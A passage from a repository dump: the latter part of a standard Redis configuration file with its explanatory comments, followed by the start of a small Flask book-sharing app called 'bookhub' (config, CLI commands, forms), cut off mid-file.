On eviction, because of the maxmemory and maxmemory policy configurations, 629 | # in order to make room for new data, without going over the specified 630 | # memory limit. 631 | # 2) Because of expire: when a key with an associated time to live (see the 632 | # EXPIRE command) must be deleted from memory. 633 | # 3) Because of a side effect of a command that stores data on a key that may 634 | # already exist. For example the RENAME command may delete the old key 635 | # content when it is replaced with another one. Similarly SUNIONSTORE 636 | # or SORT with STORE option may delete existing keys. The SET command 637 | # itself removes any old content of the specified key in order to replace 638 | # it with the specified string. 639 | # 4) During replication, when a slave performs a full resynchronization with 640 | # its master, the content of the whole database is removed in order to 641 | # load the RDB file just transfered. 642 | # 643 | # In all the above cases the default is to delete objects in a blocking way, 644 | # like if DEL was called. However you can configure each case specifically 645 | # in order to instead release memory in a non-blocking way like if UNLINK 646 | # was called, using the following configuration directives: 647 | 648 | lazyfree-lazy-eviction no 649 | lazyfree-lazy-expire no 650 | lazyfree-lazy-server-del no 651 | slave-lazy-flush no 652 | 653 | ############################## APPEND ONLY MODE ############################### 654 | 655 | # By default Redis asynchronously dumps the dataset on disk. This mode is 656 | # good enough in many applications, but an issue with the Redis process or 657 | # a power outage may result into a few minutes of writes lost (depending on 658 | # the configured save points). 659 | # 660 | # The Append Only File is an alternative persistence mode that provides 661 | # much better durability. For instance using the default data fsync policy 662 | # (see later in the config file) Redis can lose just one second of writes in a 663 | # dramatic event like a server power outage, or a single write if something 664 | # wrong with the Redis process itself happens, but the operating system is 665 | # still running correctly. 666 | # 667 | # AOF and RDB persistence can be enabled at the same time without problems. 668 | # If the AOF is enabled on startup Redis will load the AOF, that is the file 669 | # with the better durability guarantees. 670 | # 671 | # Please check http://redis.io/topics/persistence for more information. 672 | 673 | appendonly no 674 | 675 | # The name of the append only file (default: "appendonly.aof") 676 | 677 | appendfilename "appendonly.aof" 678 | 679 | # The fsync() call tells the Operating System to actually write data on disk 680 | # instead of waiting for more data in the output buffer. Some OS will really flush 681 | # data on disk, some other OS will just try to do it ASAP. 682 | # 683 | # Redis supports three different modes: 684 | # 685 | # no: don't fsync, just let the OS flush the data when it wants. Faster. 686 | # always: fsync after every write to the append only log. Slow, Safest. 687 | # everysec: fsync only one time every second. Compromise. 688 | # 689 | # The default is "everysec", as that's usually the right compromise between 690 | # speed and data safety. It's up to you to understand if you can relax this to 691 | # "no" that will let the operating system flush the output buffer when 692 | # it wants, for better performances (but if you can live with the idea of 693 | # some data loss consider the default persistence mode that's snapshotting), 694 | # or on the contrary, use "always" that's very slow but a bit safer than 695 | # everysec. 696 | # 697 | # More details please check the following article: 698 | # http://antirez.com/post/redis-persistence-demystified.html 699 | # 700 | # If unsure, use "everysec". 701 | 702 | # appendfsync always 703 | appendfsync everysec 704 | # appendfsync no 705 | 706 | # When the AOF fsync policy is set to always or everysec, and a background 707 | # saving process (a background save or AOF log background rewriting) is 708 | # performing a lot of I/O against the disk, in some Linux configurations 709 | # Redis may block too long on the fsync() call. Note that there is no fix for 710 | # this currently, as even performing fsync in a different thread will block 711 | # our synchronous write(2) call. 712 | # 713 | # In order to mitigate this problem it's possible to use the following option 714 | # that will prevent fsync() from being called in the main process while a 715 | # BGSAVE or BGREWRITEAOF is in progress. 716 | # 717 | # This means that while another child is saving, the durability of Redis is 718 | # the same as "appendfsync none". In practical terms, this means that it is 719 | # possible to lose up to 30 seconds of log in the worst scenario (with the 720 | # default Linux settings). 721 | # 722 | # If you have latency problems turn this to "yes". Otherwise leave it as 723 | # "no" that is the safest pick from the point of view of durability. 724 | 725 | no-appendfsync-on-rewrite no 726 | 727 | # Automatic rewrite of the append only file. 728 | # Redis is able to automatically rewrite the log file implicitly calling 729 | # BGREWRITEAOF when the AOF log size grows by the specified percentage. 730 | # 731 | # This is how it works: Redis remembers the size of the AOF file after the 732 | # latest rewrite (if no rewrite has happened since the restart, the size of 733 | # the AOF at startup is used). 734 | # 735 | # This base size is compared to the current size. If the current size is 736 | # bigger than the specified percentage, the rewrite is triggered. Also 737 | # you need to specify a minimal size for the AOF file to be rewritten, this 738 | # is useful to avoid rewriting the AOF file even if the percentage increase 739 | # is reached but it is still pretty small. 740 | # 741 | # Specify a percentage of zero in order to disable the automatic AOF 742 | # rewrite feature. 743 | 744 | auto-aof-rewrite-percentage 100 745 | auto-aof-rewrite-min-size 64mb 746 | 747 | # An AOF file may be found to be truncated at the end during the Redis 748 | # startup process, when the AOF data gets loaded back into memory. 749 | # This may happen when the system where Redis is running 750 | # crashes, especially when an ext4 filesystem is mounted without the 751 | # data=ordered option (however this can't happen when Redis itself 752 | # crashes or aborts but the operating system still works correctly). 753 | # 754 | # Redis can either exit with an error when this happens, or load as much 755 | # data as possible (the default now) and start if the AOF file is found 756 | # to be truncated at the end. The following option controls this behavior. 757 | # 758 | # If aof-load-truncated is set to yes, a truncated AOF file is loaded and 759 | # the Redis server starts emitting a log to inform the user of the event. 760 | # Otherwise if the option is set to no, the server aborts with an error 761 | # and refuses to start. When the option is set to no, the user requires 762 | # to fix the AOF file using the "redis-check-aof" utility before to restart 763 | # the server. 764 | # 765 | # Note that if the AOF file will be found to be corrupted in the middle 766 | # the server will still exit with an error. This option only applies when 767 | # Redis will try to read more data from the AOF file but not enough bytes 768 | # will be found. 769 | aof-load-truncated yes 770 | 771 | # When rewriting the AOF file, Redis is able to use an RDB preamble in the 772 | # AOF file for faster rewrites and recoveries. When this option is turned 773 | # on the rewritten AOF file is composed of two different stanzas: 774 | # 775 | # [RDB file][AOF tail] 776 | # 777 | # When loading Redis recognizes that the AOF file starts with the "REDIS" 778 | # string and loads the prefixed RDB file, and continues loading the AOF 779 | # tail. 780 | # 781 | # This is currently turned off by default in order to avoid the surprise 782 | # of a format change, but will at some point be used as the default. 783 | aof-use-rdb-preamble no 784 | 785 | ################################ LUA SCRIPTING ############################### 786 | 787 | # Max execution time of a Lua script in milliseconds. 788 | # 789 | # If the maximum execution time is reached Redis will log that a script is 790 | # still in execution after the maximum allowed time and will start to 791 | # reply to queries with an error. 792 | # 793 | # When a long running script exceeds the maximum execution time only the 794 | # SCRIPT KILL and SHUTDOWN NOSAVE commands are available. The first can be 795 | # used to stop a script that did not yet called write commands. The second 796 | # is the only way to shut down the server in the case a write command was 797 | # already issued by the script but the user doesn't want to wait for the natural 798 | # termination of the script. 799 | # 800 | # Set it to 0 or a negative value for unlimited execution without warnings. 801 | lua-time-limit 5000 802 | 803 | ################################ REDIS CLUSTER ############################### 804 | # 805 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 806 | # WARNING EXPERIMENTAL: Redis Cluster is considered to be stable code, however 807 | # in order to mark it as "mature" we need to wait for a non trivial percentage 808 | # of users to deploy it in production. 809 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 810 | # 811 | # Normal Redis instances can't be part of a Redis Cluster; only nodes that are 812 | # started as cluster nodes can. In order to start a Redis instance as a 813 | # cluster node enable the cluster support uncommenting the following: 814 | # 815 | # cluster-enabled yes 816 | 817 | # Every cluster node has a cluster configuration file. This file is not 818 | # intended to be edited by hand. It is created and updated by Redis nodes. 819 | # Every Redis Cluster node requires a different cluster configuration file. 820 | # Make sure that instances running in the same system do not have 821 | # overlapping cluster configuration file names. 822 | # 823 | # cluster-config-file nodes-6379.conf 824 | 825 | # Cluster node timeout is the amount of milliseconds a node must be unreachable 826 | # for it to be considered in failure state. 827 | # Most other internal time limits are multiple of the node timeout. 828 | # 829 | # cluster-node-timeout 15000 830 | 831 | # A slave of a failing master will avoid to start a failover if its data 832 | # looks too old. 833 | # 834 | # There is no simple way for a slave to actually have an exact measure of 835 | # its "data age", so the following two checks are performed: 836 | # 837 | # 1) If there are multiple slaves able to failover, they exchange messages 838 | # in order to try to give an advantage to the slave with the best 839 | # replication offset (more data from the master processed). 840 | # Slaves will try to get their rank by offset, and apply to the start 841 | # of the failover a delay proportional to their rank. 842 | # 843 | # 2) Every single slave computes the time of the last interaction with 844 | # its master. This can be the last ping or command received (if the master 845 | # is still in the "connected" state), or the time that elapsed since the 846 | # disconnection with the master (if the replication link is currently down). 847 | # If the last interaction is too old, the slave will not try to failover 848 | # at all. 849 | # 850 | # The point "2" can be tuned by user. Specifically a slave will not perform 851 | # the failover if, since the last interaction with the master, the time 852 | # elapsed is greater than: 853 | # 854 | # (node-timeout * slave-validity-factor) + repl-ping-slave-period 855 | # 856 | # So for example if node-timeout is 30 seconds, and the slave-validity-factor 857 | # is 10, and assuming a default repl-ping-slave-period of 10 seconds, the 858 | # slave will not try to failover if it was not able to talk with the master 859 | # for longer than 310 seconds. 860 | # 861 | # A large slave-validity-factor may allow slaves with too old data to failover 862 | # a master, while a too small value may prevent the cluster from being able to 863 | # elect a slave at all. 864 | # 865 | # For maximum availability, it is possible to set the slave-validity-factor 866 | # to a value of 0, which means, that slaves will always try to failover the 867 | # master regardless of the last time they interacted with the master. 868 | # (However they'll always try to apply a delay proportional to their 869 | # offset rank). 870 | # 871 | # Zero is the only value able to guarantee that when all the partitions heal 872 | # the cluster will always be able to continue. 873 | # 874 | # cluster-slave-validity-factor 10 875 | 876 | # Cluster slaves are able to migrate to orphaned masters, that are masters 877 | # that are left without working slaves. This improves the cluster ability 878 | # to resist to failures as otherwise an orphaned master can't be failed over 879 | # in case of failure if it has no working slaves. 880 | # 881 | # Slaves migrate to orphaned masters only if there are still at least a 882 | # given number of other working slaves for their old master. This number 883 | # is the "migration barrier". A migration barrier of 1 means that a slave 884 | # will migrate only if there is at least 1 other working slave for its master 885 | # and so forth. It usually reflects the number of slaves you want for every 886 | # master in your cluster. 887 | # 888 | # Default is 1 (slaves migrate only if their masters remain with at least 889 | # one slave). To disable migration just set it to a very large value. 890 | # A value of 0 can be set but is useful only for debugging and dangerous 891 | # in production. 892 | # 893 | # cluster-migration-barrier 1 894 | 895 | # By default Redis Cluster nodes stop accepting queries if they detect there 896 | # is at least an hash slot uncovered (no available node is serving it). 897 | # This way if the cluster is partially down (for example a range of hash slots 898 | # are no longer covered) all the cluster becomes, eventually, unavailable. 899 | # It automatically returns available as soon as all the slots are covered again. 900 | # 901 | # However sometimes you want the subset of the cluster which is working, 902 | # to continue to accept queries for the part of the key space that is still 903 | # covered. In order to do so, just set the cluster-require-full-coverage 904 | # option to no. 905 | # 906 | # cluster-require-full-coverage yes 907 | 908 | # This option, when set to yes, prevents slaves from trying to failover its 909 | # master during master failures. However the master can still perform a 910 | # manual failover, if forced to do so. 911 | # 912 | # This is useful in different scenarios, especially in the case of multiple 913 | # data center operations, where we want one side to never be promoted if not 914 | # in the case of a total DC failure. 915 | # 916 | # cluster-slave-no-failover no 917 | 918 | # In order to setup your cluster make sure to read the documentation 919 | # available at http://redis.io web site. 920 | 921 | ########################## CLUSTER DOCKER/NAT support ######################## 922 | 923 | # In certain deployments, Redis Cluster nodes address discovery fails, because 924 | # addresses are NAT-ted or because ports are forwarded (the typical case is 925 | # Docker and other containers). 926 | # 927 | # In order to make Redis Cluster working in such environments, a static 928 | # configuration where each node knows its public address is needed. The 929 | # following two options are used for this scope, and are: 930 | # 931 | # * cluster-announce-ip 932 | # * cluster-announce-port 933 | # * cluster-announce-bus-port 934 | # 935 | # Each instruct the node about its address, client port, and cluster message 936 | # bus port. The information is then published in the header of the bus packets 937 | # so that other nodes will be able to correctly map the address of the node 938 | # publishing the information. 939 | # 940 | # If the above options are not used, the normal Redis Cluster auto-detection 941 | # will be used instead. 942 | # 943 | # Note that when remapped, the bus port may not be at the fixed offset of 944 | # clients port + 10000, so you can specify any port and bus-port depending 945 | # on how they get remapped. If the bus-port is not set, a fixed offset of 946 | # 10000 will be used as usually. 947 | # 948 | # Example: 949 | # 950 | # cluster-announce-ip 10.1.1.5 951 | # cluster-announce-port 6379 952 | # cluster-announce-bus-port 6380 953 | 954 | ################################## SLOW LOG ################################### 955 | 956 | # The Redis Slow Log is a system to log queries that exceeded a specified 957 | # execution time. The execution time does not include the I/O operations 958 | # like talking with the client, sending the reply and so forth, 959 | # but just the time needed to actually execute the command (this is the only 960 | # stage of command execution where the thread is blocked and can not serve 961 | # other requests in the meantime). 962 | # 963 | # You can configure the slow log with two parameters: one tells Redis 964 | # what is the execution time, in microseconds, to exceed in order for the 965 | # command to get logged, and the other parameter is the length of the 966 | # slow log. When a new command is logged the oldest one is removed from the 967 | # queue of logged commands. 968 | 969 | # The following time is expressed in microseconds, so 1000000 is equivalent 970 | # to one second. Note that a negative number disables the slow log, while 971 | # a value of zero forces the logging of every command. 972 | slowlog-log-slower-than 10000 973 | 974 | # There is no limit to this length. Just be aware that it will consume memory. 975 | # You can reclaim memory used by the slow log with SLOWLOG RESET. 976 | slowlog-max-len 128 977 | 978 | ################################ LATENCY MONITOR ############################## 979 | 980 | # The Redis latency monitoring subsystem samples different operations 981 | # at runtime in order to collect data related to possible sources of 982 | # latency of a Redis instance. 983 | # 984 | # Via the LATENCY command this information is available to the user that can 985 | # print graphs and obtain reports. 986 | # 987 | # The system only logs operations that were performed in a time equal or 988 | # greater than the amount of milliseconds specified via the 989 | # latency-monitor-threshold configuration directive. When its value is set 990 | # to zero, the latency monitor is turned off. 991 | # 992 | # By default latency monitoring is disabled since it is mostly not needed 993 | # if you don't have latency issues, and collecting data has a performance 994 | # impact, that while very small, can be measured under big load. Latency 995 | # monitoring can easily be enabled at runtime using the command 996 | # "CONFIG SET latency-monitor-threshold " if needed. 997 | latency-monitor-threshold 0 998 | 999 | ############################# EVENT NOTIFICATION ############################## 1000 | 1001 | # Redis can notify Pub/Sub clients about events happening in the key space. 1002 | # This feature is documented at http://redis.io/topics/notifications 1003 | # 1004 | # For instance if keyspace events notification is enabled, and a client 1005 | # performs a DEL operation on key "foo" stored in the Database 0, two 1006 | # messages will be published via Pub/Sub: 1007 | # 1008 | # PUBLISH __keyspace@0__:foo del 1009 | # PUBLISH __keyevent@0__:del foo 1010 | # 1011 | # It is possible to select the events that Redis will notify among a set 1012 | # of classes. Every class is identified by a single character: 1013 | # 1014 | # K Keyspace events, published with __keyspace@__ prefix. 1015 | # E Keyevent events, published with __keyevent@__ prefix. 1016 | # g Generic commands (non-type specific) like DEL, EXPIRE, RENAME, ... 1017 | # $ String commands 1018 | # l List commands 1019 | # s Set commands 1020 | # h Hash commands 1021 | # z Sorted set commands 1022 | # x Expired events (events generated every time a key expires) 1023 | # e Evicted events (events generated when a key is evicted for maxmemory) 1024 | # A Alias for g$lshzxe, so that the "AKE" string means all the events. 1025 | # 1026 | # The "notify-keyspace-events" takes as argument a string that is composed 1027 | # of zero or multiple characters. The empty string means that notifications 1028 | # are disabled. 1029 | # 1030 | # Example: to enable list and generic events, from the point of view of the 1031 | # event name, use: 1032 | # 1033 | # notify-keyspace-events Elg 1034 | # 1035 | # Example 2: to get the stream of the expired keys subscribing to channel 1036 | # name __keyevent@0__:expired use: 1037 | # 1038 | # notify-keyspace-events Ex 1039 | # 1040 | # By default all notifications are disabled because most users don't need 1041 | # this feature and the feature has some overhead. Note that if you don't 1042 | # specify at least one of K or E, no events will be delivered. 1043 | notify-keyspace-events "" 1044 | 1045 | ############################### ADVANCED CONFIG ############################### 1046 | 1047 | # Hashes are encoded using a memory efficient data structure when they have a 1048 | # small number of entries, and the biggest entry does not exceed a given 1049 | # threshold. These thresholds can be configured using the following directives. 1050 | hash-max-ziplist-entries 512 1051 | hash-max-ziplist-value 64 1052 | 1053 | # Lists are also encoded in a special way to save a lot of space. 1054 | # The number of entries allowed per internal list node can be specified 1055 | # as a fixed maximum size or a maximum number of elements. 1056 | # For a fixed maximum size, use -5 through -1, meaning: 1057 | # -5: max size: 64 Kb <-- not recommended for normal workloads 1058 | # -4: max size: 32 Kb <-- not recommended 1059 | # -3: max size: 16 Kb <-- probably not recommended 1060 | # -2: max size: 8 Kb <-- good 1061 | # -1: max size: 4 Kb <-- good 1062 | # Positive numbers mean store up to _exactly_ that number of elements 1063 | # per list node. 1064 | # The highest performing option is usually -2 (8 Kb size) or -1 (4 Kb size), 1065 | # but if your use case is unique, adjust the settings as necessary. 1066 | list-max-ziplist-size -2 1067 | 1068 | # Lists may also be compressed. 1069 | # Compress depth is the number of quicklist ziplist nodes from *each* side of 1070 | # the list to *exclude* from compression. The head and tail of the list 1071 | # are always uncompressed for fast push/pop operations. Settings are: 1072 | # 0: disable all list compression 1073 | # 1: depth 1 means "don't start compressing until after 1 node into the list, 1074 | # going from either the head or tail" 1075 | # So: [head]->node->node->...->node->[tail] 1076 | # [head], [tail] will always be uncompressed; inner nodes will compress. 1077 | # 2: [head]->[next]->node->node->...->node->[prev]->[tail] 1078 | # 2 here means: don't compress head or head->next or tail->prev or tail, 1079 | # but compress all nodes between them. 1080 | # 3: [head]->[next]->[next]->node->node->...->node->[prev]->[prev]->[tail] 1081 | # etc. 1082 | list-compress-depth 0 1083 | 1084 | # Sets have a special encoding in just one case: when a set is composed 1085 | # of just strings that happen to be integers in radix 10 in the range 1086 | # of 64 bit signed integers. 1087 | # The following configuration setting sets the limit in the size of the 1088 | # set in order to use this special memory saving encoding. 1089 | set-max-intset-entries 512 1090 | 1091 | # Similarly to hashes and lists, sorted sets are also specially encoded in 1092 | # order to save a lot of space. This encoding is only used when the length and 1093 | # elements of a sorted set are below the following limits: 1094 | zset-max-ziplist-entries 128 1095 | zset-max-ziplist-value 64 1096 | 1097 | # HyperLogLog sparse representation bytes limit. The limit includes the 1098 | # 16 bytes header. When an HyperLogLog using the sparse representation crosses 1099 | # this limit, it is converted into the dense representation. 1100 | # 1101 | # A value greater than 16000 is totally useless, since at that point the 1102 | # dense representation is more memory efficient. 1103 | # 1104 | # The suggested value is ~ 3000 in order to have the benefits of 1105 | # the space efficient encoding without slowing down too much PFADD, 1106 | # which is O(N) with the sparse encoding. The value can be raised to 1107 | # ~ 10000 when CPU is not a concern, but space is, and the data set is 1108 | # composed of many HyperLogLogs with cardinality in the 0 - 15000 range. 1109 | hll-sparse-max-bytes 3000 1110 | 1111 | # Active rehashing uses 1 millisecond every 100 milliseconds of CPU time in 1112 | # order to help rehashing the main Redis hash table (the one mapping top-level 1113 | # keys to values). The hash table implementation Redis uses (see dict.c) 1114 | # performs a lazy rehashing: the more operation you run into a hash table 1115 | # that is rehashing, the more rehashing "steps" are performed, so if the 1116 | # server is idle the rehashing is never complete and some more memory is used 1117 | # by the hash table. 1118 | # 1119 | # The default is to use this millisecond 10 times every second in order to 1120 | # actively rehash the main dictionaries, freeing memory when possible. 1121 | # 1122 | # If unsure: 1123 | # use "activerehashing no" if you have hard latency requirements and it is 1124 | # not a good thing in your environment that Redis can reply from time to time 1125 | # to queries with 2 milliseconds delay. 1126 | # 1127 | # use "activerehashing yes" if you don't have such hard requirements but 1128 | # want to free memory asap when possible. 1129 | activerehashing yes 1130 | 1131 | # The client output buffer limits can be used to force disconnection of clients 1132 | # that are not reading data from the server fast enough for some reason (a 1133 | # common reason is that a Pub/Sub client can't consume messages as fast as the 1134 | # publisher can produce them). 1135 | # 1136 | # The limit can be set differently for the three different classes of clients: 1137 | # 1138 | # normal -> normal clients including MONITOR clients 1139 | # slave -> slave clients 1140 | # pubsub -> clients subscribed to at least one pubsub channel or pattern 1141 | # 1142 | # The syntax of every client-output-buffer-limit directive is the following: 1143 | # 1144 | # client-output-buffer-limit 1145 | # 1146 | # A client is immediately disconnected once the hard limit is reached, or if 1147 | # the soft limit is reached and remains reached for the specified number of 1148 | # seconds (continuously). 1149 | # So for instance if the hard limit is 32 megabytes and the soft limit is 1150 | # 16 megabytes / 10 seconds, the client will get disconnected immediately 1151 | # if the size of the output buffers reach 32 megabytes, but will also get 1152 | # disconnected if the client reaches 16 megabytes and continuously overcomes 1153 | # the limit for 10 seconds. 1154 | # 1155 | # By default normal clients are not limited because they don't receive data 1156 | # without asking (in a push way), but just after a request, so only 1157 | # asynchronous clients may create a scenario where data is requested faster 1158 | # than it can read. 1159 | # 1160 | # Instead there is a default limit for pubsub and slave clients, since 1161 | # subscribers and slaves receive data in a push fashion. 1162 | # 1163 | # Both the hard or the soft limit can be disabled by setting them to zero. 1164 | client-output-buffer-limit normal 0 0 0 1165 | client-output-buffer-limit slave 256mb 64mb 60 1166 | client-output-buffer-limit pubsub 32mb 8mb 60 1167 | 1168 | # Client query buffers accumulate new commands. They are limited to a fixed 1169 | # amount by default in order to avoid that a protocol desynchronization (for 1170 | # instance due to a bug in the client) will lead to unbound memory usage in 1171 | # the query buffer. However you can configure it here if you have very special 1172 | # needs, such us huge multi/exec requests or alike. 1173 | # 1174 | # client-query-buffer-limit 1gb 1175 | 1176 | # In the Redis protocol, bulk requests, that are, elements representing single 1177 | # strings, are normally limited ot 512 mb. However you can change this limit 1178 | # here. 1179 | # 1180 | # proto-max-bulk-len 512mb 1181 | 1182 | # Redis calls an internal function to perform many background tasks, like 1183 | # closing connections of clients in timeout, purging expired keys that are 1184 | # never requested, and so forth. 1185 | # 1186 | # Not all tasks are performed with the same frequency, but Redis checks for 1187 | # tasks to perform according to the specified "hz" value. 1188 | # 1189 | # By default "hz" is set to 10. Raising the value will use more CPU when 1190 | # Redis is idle, but at the same time will make Redis more responsive when 1191 | # there are many keys expiring at the same time, and timeouts may be 1192 | # handled with more precision. 1193 | # 1194 | # The range is between 1 and 500, however a value over 100 is usually not 1195 | # a good idea. Most users should use the default of 10 and raise this up to 1196 | # 100 only in environments where very low latency is required. 1197 | hz 10 1198 | 1199 | # When a child rewrites the AOF file, if the following option is enabled 1200 | # the file will be fsync-ed every 32 MB of data generated. This is useful 1201 | # in order to commit the file to the disk more incrementally and avoid 1202 | # big latency spikes. 1203 | aof-rewrite-incremental-fsync yes 1204 | 1205 | # Redis LFU eviction (see maxmemory setting) can be tuned. However it is a good 1206 | # idea to start with the default settings and only change them after investigating 1207 | # how to improve the performances and how the keys LFU change over time, which 1208 | # is possible to inspect via the OBJECT FREQ command. 1209 | # 1210 | # There are two tunable parameters in the Redis LFU implementation: the 1211 | # counter logarithm factor and the counter decay time. It is important to 1212 | # understand what the two parameters mean before changing them. 1213 | # 1214 | # The LFU counter is just 8 bits per key, it's maximum value is 255, so Redis 1215 | # uses a probabilistic increment with logarithmic behavior. Given the value 1216 | # of the old counter, when a key is accessed, the counter is incremented in 1217 | # this way: 1218 | # 1219 | # 1. A random number R between 0 and 1 is extracted. 1220 | # 2. A probability P is calculated as 1/(old_value*lfu_log_factor+1). 1221 | # 3. The counter is incremented only if R < P. 1222 | # 1223 | # The default lfu-log-factor is 10. This is a table of how the frequency 1224 | # counter changes with a different number of accesses with different 1225 | # logarithmic factors: 1226 | # 1227 | # +--------+------------+------------+------------+------------+------------+ 1228 | # | factor | 100 hits | 1000 hits | 100K hits | 1M hits | 10M hits | 1229 | # +--------+------------+------------+------------+------------+------------+ 1230 | # | 0 | 104 | 255 | 255 | 255 | 255 | 1231 | # +--------+------------+------------+------------+------------+------------+ 1232 | # | 1 | 18 | 49 | 255 | 255 | 255 | 1233 | # +--------+------------+------------+------------+------------+------------+ 1234 | # | 10 | 10 | 18 | 142 | 255 | 255 | 1235 | # +--------+------------+------------+------------+------------+------------+ 1236 | # | 100 | 8 | 11 | 49 | 143 | 255 | 1237 | # +--------+------------+------------+------------+------------+------------+ 1238 | # 1239 | # NOTE: The above table was obtained by running the following commands: 1240 | # 1241 | # redis-benchmark -n 1000000 incr foo 1242 | # redis-cli object freq foo 1243 | # 1244 | # NOTE 2: The counter initial value is 5 in order to give new objects a chance 1245 | # to accumulate hits. 1246 | # 1247 | # The counter decay time is the time, in minutes, that must elapse in order 1248 | # for the key counter to be divided by two (or decremented if it has a value 1249 | # less <= 10). 1250 | # 1251 | # The default value for the lfu-decay-time is 1. A Special value of 0 means to 1252 | # decay the counter every time it happens to be scanned. 1253 | # 1254 | # lfu-log-factor 10 1255 | # lfu-decay-time 1 1256 | 1257 | ########################### ACTIVE DEFRAGMENTATION ####################### 1258 | # 1259 | # WARNING THIS FEATURE IS EXPERIMENTAL. However it was stress tested 1260 | # even in production and manually tested by multiple engineers for some 1261 | # time. 1262 | # 1263 | # What is active defragmentation? 1264 | # ------------------------------- 1265 | # 1266 | # Active (online) defragmentation allows a Redis server to compact the 1267 | # spaces left between small allocations and deallocations of data in memory, 1268 | # thus allowing to reclaim back memory. 1269 | # 1270 | # Fragmentation is a natural process that happens with every allocator (but 1271 | # less so with Jemalloc, fortunately) and certain workloads. Normally a server 1272 | # restart is needed in order to lower the fragmentation, or at least to flush 1273 | # away all the data and create it again. However thanks to this feature 1274 | # implemented by Oran Agra for Redis 4.0 this process can happen at runtime 1275 | # in an "hot" way, while the server is running. 1276 | # 1277 | # Basically when the fragmentation is over a certain level (see the 1278 | # configuration options below) Redis will start to create new copies of the 1279 | # values in contiguous memory regions by exploiting certain specific Jemalloc 1280 | # features (in order to understand if an allocation is causing fragmentation 1281 | # and to allocate it in a better place), and at the same time, will release the 1282 | # old copies of the data. This process, repeated incrementally for all the keys 1283 | # will cause the fragmentation to drop back to normal values. 1284 | # 1285 | # Important things to understand: 1286 | # 1287 | # 1. This feature is disabled by default, and only works if you compiled Redis 1288 | # to use the copy of Jemalloc we ship with the source code of Redis. 1289 | # This is the default with Linux builds. 1290 | # 1291 | # 2. You never need to enable this feature if you don't have fragmentation 1292 | # issues. 1293 | # 1294 | # 3. Once you experience fragmentation, you can enable this feature when 1295 | # needed with the command "CONFIG SET activedefrag yes". 1296 | # 1297 | # The configuration parameters are able to fine tune the behavior of the 1298 | # defragmentation process. If you are not sure about what they mean it is 1299 | # a good idea to leave the defaults untouched. 1300 | 1301 | # Enabled active defragmentation 1302 | # activedefrag yes 1303 | 1304 | # Minimum amount of fragmentation waste to start active defrag 1305 | # active-defrag-ignore-bytes 100mb 1306 | 1307 | # Minimum percentage of fragmentation to start active defrag 1308 | # active-defrag-threshold-lower 10 1309 | 1310 | # Maximum percentage of fragmentation at which we use maximum effort 1311 | # active-defrag-threshold-upper 100 1312 | 1313 | # Minimal effort for defrag in CPU percentage 1314 | # active-defrag-cycle-min 25 1315 | 1316 | # Maximal effort for defrag in CPU percentage 1317 | # active-defrag-cycle-max 75 1318 | -------------------------------------------------------------------------------- /2018/bookhub/rsync-exclude.txt: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | *.pyc 3 | .idea 4 | .vscode 5 | venv 6 | .env 7 | db.sqlite3 8 | 9 | -------------------------------------------------------------------------------- /2018/bookhub/src/.gitignore: -------------------------------------------------------------------------------- 1 | db.sqlite3 2 | /venv/ 3 | .idea/ 4 | .env 5 | __pycache__ 6 | *.pyc -------------------------------------------------------------------------------- /2018/bookhub/src/app.py: -------------------------------------------------------------------------------- 1 | from bookhub import app, db 2 | import bookhub.commands 3 | import bookhub.models 4 | from bookhub.views import * 5 | 6 | 7 | app.register_blueprint(user_blueprint) 8 | app.register_blueprint(book_blueprint) 9 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | import redis 3 | from flask_login import LoginManager 4 | from flask import Flask 5 | from flask_sqlalchemy import SQLAlchemy 6 | from flask_migrate import Migrate 7 | from flask_session import Session 8 | from flask_wtf.csrf import CSRFProtect 9 | 10 | 11 | base_dir = os.path.dirname(os.path.abspath(__file__)) 12 | rds = redis.StrictRedis.from_url(os.environ.get('REDIS_URL')) 13 | 14 | app = Flask(__name__) 15 | app.config['SECRET_KEY'] = os.environ['SECRET_KEY'] 16 | app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL'] 17 | app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = os.environ.get('FLASK_DEBUG', False) in ('1', 'True') 18 | app.config['SESSION_COOKIE_NAME'] = 'bookhub-session' 19 | app.config['REMEMBER_COOKIE_NAME'] = 'bookhub-remember-me' 20 | app.config['REMEMBER_COOKIE_HTTPONLY'] = True 21 | app.config['SESSION_TYPE'] = 'redis' 22 | app.config['SESSION_KEY_PREFIX'] = 'bookhub:session:' 23 | app.config['SESSION_REDIS'] = rds 24 | 25 | db = SQLAlchemy(app) 26 | login_manager = LoginManager(app) 27 | migrate = Migrate(app, db) 28 | Session(app) 29 | csrf = CSRFProtect(app) 30 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/commands.py: -------------------------------------------------------------------------------- 1 | import os 2 | import click 3 | import datetime 4 | import getpass 5 | from urllib.parse import urlparse 6 | 7 | from bookhub import app, db 8 | from bookhub.models import User, Book 9 | 10 | 11 | @app.cli.command() 12 | def init(): 13 | pass 14 | 15 | 16 | @app.cli.command() 17 | def createuser(): 18 | username = input('Input username: ') 19 | password = getpass.getpass('Input password: ') 20 | user = User(username=username) 21 | user.set_password(password) 22 | 23 | db.session.add(user) 24 | db.session.commit() 25 | 26 | 27 | @app.cli.command() 28 | def createbook(): 29 | title = input('Input book title: ') 30 | description = input('Input book description: ') 31 | img = input('Input a img url: ') 32 | 33 | book = Book( 34 | title=title, 35 | description=description, 36 | img=img, 37 | created_at=datetime.datetime.now() 38 | ) 39 | db.session.add(book) 40 | db.session.commit() 41 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/__init__.py: -------------------------------------------------------------------------------- 1 | from .user import LoginForm, UserForm 2 | from .book import BookForm 3 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/book.py: -------------------------------------------------------------------------------- 1 | from flask_wtf import FlaskForm 2 | from wtforms import StringField, TextAreaField 3 | from wtforms.validators import DataRequired, StopValidation, URL, Length 4 | 5 | 6 | class BookForm(FlaskForm): 7 | title = StringField('title', validators=[DataRequired(), Length(1, 256)]) 8 | description = TextAreaField('description') 9 | img = StringField('cover', validators=[URL(), Length(1, 256)]) 10 | -------------------------------------------------------------------------------- /2018/bookhub/src/bookhub/forms/user.py: -------------------------------------------------------------------------------- 1 | import os 2 | import flask 3 | from flask_wtf import 